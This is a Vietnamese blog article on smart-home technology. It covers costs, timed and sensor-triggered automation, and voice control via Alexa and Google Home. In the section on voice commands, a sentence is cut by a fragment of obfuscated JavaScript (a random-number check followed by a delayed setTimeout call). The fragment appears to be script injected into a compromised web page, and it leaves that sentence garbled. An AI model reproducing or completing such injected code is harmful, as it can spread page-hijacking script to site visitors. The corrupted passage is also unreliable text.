Những điều cần biết về công nghệ nhà thông minh mới nhất 2018

Trước đây, công nghệ nhà thông minh được xem là một tiện nghi siêu cao cấp, thường chỉ xuất hiện trong phim ảnh hay trong dinh thự của giới thượng lưu, tỉ phú. Tuy nhiên, với sự phát triển của công nghệ, đặc biệt là sự xuất hiện của IoT (Internet of Things), các thiết bị smart-home dần trở nên phổ biến và dễ tiếp cận hơn với mọi người.

Công nghệ nhà thông minh là gì?

cong-nghe-nha-thong-minh-moi-nhat-1

Công nghệ nhà thông minh là gì?

Hệ thống nhà thông minh có thể được hiểu đơn giản là hệ thống các thiết bị trong nhà được kết nối và tương tác tự động với nhau, giúp nâng cao trải nghiệm sống trong căn nhà của bạn. Hệ thống này có khả năng tự động hóa nhiều hành động khác nhau giữa các thiết bị kết nối mà không cần đến sự tương tác của bạn. Ví dụ: tự động mở đèn khi trời tối, tự động mở máy lạnh khi nhiệt độ phòng vượt ngưỡng giới hạn, báo động khi camera phát hiện kẻ trộm,…

Chi phí lắp đặt nhà thông minh có thể dao động từ vài triệu đến vài chục triệu hay vài trăm triệu tùy vào nhu cầu sử dụng của bạn. Hệ thống càng phức tạp, càng nhiều ngữ cảnh tự động sẽ đòi hỏi càng nhiều thiết bị kết nối, khiến chi phí tăng lên nhanh chóng.

Nếu chỉ mới tìm hiểu về công nghệ nhà thông minh, các bạn chỉ nên bắt đầu với các thiết bị đơn giản như công tắc thông minh, đèn thông minh, camera tự động. Một khi đã quen với việc cấu hình và thiết lập thiết bị, các bạn sẽ dễ dàng mở rộng quy mô để biến căn nhà của bạn thực sự trở thành một Smart-Home đúng nghĩa.

 Cơ chế hoạt động công nghệ nhà thông minh

Hệ thống tự động của nhà thông minh được dựa trên 2 cơ chế chính: dựa trên sự kiện thời gian (timed event) và dựa trên sự kiện tương tác (triggered event).

 •  Sự kiện thời gian

Hệ thống nhà thông minh giống như một chiếc đồng hồ báo thức cao cấp. Nó luôn luôn nắm rõ thời gian trong ngày và kích hoạt thiết bị vào đúng thời điểm cần thiết bạn đã thiết lập trước đó. Chúng ta có thể hiểu rõ hơn về sự kiện thời gian qua một số ví dụ sau:

-Bật đèn vào buổi sáng

-Mở đèn ở hiên nhà 15 phút trước khi trời tối

-Mở máy lạnh lúc 4h30 chiều, 30 phút trước khi bạn về đến nhà.

-Kích hoạt hệ thống báo động lúc 12h đêm để chống trộm

 • Công nghệ nhà thông minh dựa vào sự kiện tương tác

Sự kiện tương tác kích hoạt hệ thống nhà thông minh dựa vào cơ chế cảm biến hành động. Nó hoạt động nhờ vào các cảm biến thông minh trong nhà của bạn. Ví dụ như sau:

 • Mở hay đóng cửa
 • Bấm nút
 • Nhiệt độ
 • Độ ẩm
 • Cảm biến chuyển động
 • Giọng nói

Trong số các sự kiện tương tác kể trên, điều khiển bằng giọng nói (Voice Commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and) là công nghệ thông minh mới nhất nhưng cũng thú vị nhất. Nó mang đến một trải nghiệm hoàn toàn mới lạ cho hệ thống nhà thông mình.

cong-nghe-nha-thong-minh-moi-nhat-2

Cơ chế hoạt động trong công nghệ nhà thông minh

Với thiết bị Alexa (của Amazon) hay Google Home (của Google), bạn có thể dễ dàng điều khiển các thiết bị trong nhà chỉ bằng cách ra lệnh:

 • Hey Google, turn on the light
 • Alexa, turn off the light.
 • Hy vọng trong tương lai không xa, chúng ta có thể ra lệnh bằng tiếng Việt cho sướng: “Ê Google, tắt đèn dùm tao!”

Kết hợp hai loại sự kiện trên có thể mang đến rất nhiều ngữ cảnh tự động hóa thú vị cho ngôi nhà của bạn. Dưới đây là một số ví dụ:

 • Tự động bật máy lạnh từ điện thoại trên đường về nhà. Khi về đến nhà, phòng đã mát lạnh chờ đón.
 • Ra lệnh cho Google Home mở hoặc tắt tất cả đèn trong nhà.
 • Mở đèn, báo động khi camera phát hiện chuyển động lạ vào nữa đêm.
 • Tự động mở đèn trong khi bạn mở cửa chính
 • Giảm âm lượng TV khi có khách bấm chuông trước cửa để bạn có thể nghe được tiếng chuông.

Sử dụng các thiết bị trợ lý bằng giọng nói như Alexa hay Google Assistant có thể nhắc nhở người già việc uống thuốc mỗi ngày. Chúng còn cung cấp thông tin hữu ích mỗi ngày như thời tiết, tin tức…Những người khuyết tật có thể dễ dàng điều khiển các thiết bị trong nhà chỉ với giọng nói mà không cần phải di chuyển khó khăn.

Như vậy, công nghệ nhà thông minh giúp chúng ta cải thiện khả năng kiểm soát môi trường xung quanh, nâng cao chất lượng cuộc sống.

0/5 (0 Reviews)

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *